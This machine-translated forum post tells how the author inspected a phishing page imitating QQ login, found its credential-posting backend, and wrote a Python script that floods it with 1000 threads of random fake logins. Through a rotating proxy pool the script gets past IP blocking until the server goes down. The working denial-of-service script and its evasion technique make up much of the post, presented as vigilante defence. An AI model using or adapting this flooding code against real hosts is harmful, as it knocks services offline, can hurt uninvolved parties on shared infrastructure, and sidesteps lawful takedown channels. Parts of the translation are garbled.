Things have to start with a website I saw in My Love, put the address: http://tencent.outlook.com.eskdp.xyz/mail/
After opening it is a page that imitates the login of QQ space, and then you enter anything in the account password box, it will jump to the page of QQ mailbox (the QQ mailbox here is indeed a QQ mailbox under Tencent), which will give a lot of small Bai
created an illusion: Well, there must be a problem with the QQ family, and when I logged into the QQ space, I jumped to the QQ mailbox.
Let's grab the package, open the developer tool on this page (right-click-check), open Network, because there will be a jump later, so check the Preserve log, and then enter a string of account passwords, and click login
Then you will find that api.php is caught, the full address is http://tencent.outlook.com.eskdp.xyz/mail/api/api.php
The post method sends two fields username and password to
remember this address, the program will use it later
Okay, we have got the real backend address. Thinking of this, someone grinned. Our idea is to keep sending requests to it until his server crashes (it will be restarted later).
So the first version of the code was released. It was crazy to send post requests through multi-threading. After testing, it was found that there were some problems, that is, this website seems to be able to lock the IP and restrict the requested IP. In this case,
someone grinned With a smile, I thought of the IP generation {over}{filter} pool, so I cloned a git open source project to inject soul into the program, so I opened the program, and after a minute, I refreshed the phishing website again, and it couldn't be opened anymore.
The generation{over}理{filter} pool project I used is https://github.com/jhao104/proxy_pool
I encountered an error when I started this project. If you have the same problem, please refer to the issue I mentioned: https://github.com/jhao104/proxy_pool/issues/453
Put the code below
#coding=utf-8
'''
疯狂发送post请求
'''
import requests
import random
from time import ctime
import threading
count = 1
def get_proxy():
return requests.get("http://127.0.0.1:5010/get/").json()
def delete_proxy(proxy):
requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
def getResponse(postJson):
# ....
retry_count = 5
url = 'http://tencent.outlook.com.eskdp.xyz/mail/api/api.php'
proxy = get_proxy().get("proxy")
while retry_count > 0:
try:
response = requests.post(url, proxies={
"http": "http://{}".format(proxy)}, data=postJson)
# 使用代理访问
return response
except Exception:
retry_count -= 1
# 出错5次, 删除代理池中代理
delete_proxy(proxy)
return None
#创建请求函数
def postRequest():
global count
Number = "0123456789qbcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPWRSTUVWXYZ"
postJson= {
"username":random.randint(10000,9999999999),"password":"".join(random.choice(Number) for i in range(random.randint(6,10)))}#值以字典的形式传入
# response = requests.post(url=url,data=postJson)
response = getResponse(postJson)
# if response is not None
try:
print("状态码:", response.status_code, "第", count, "次发送成功")
count += 1
except :
pass
#创建数组存放线程
threads=[]
#创建1000个线程
for i in range(1000):
#针对函数创建线程
t=threading.Thread(target=postRequest,args=())
#把创建的线程加入线程组
threads.append(t)
if __name__ == '__main__':
#启动线程
for i in threads:
i.start()
#keep thread
for i in threads:
i.join()
In the future, I am going to improve it by adding periodic detection, and then put it on the server, as long as it detects that the webpage can be opened, it will continue to send. For this kind of phishing website that endangers everyone's information security, we need to work together to maintain network security.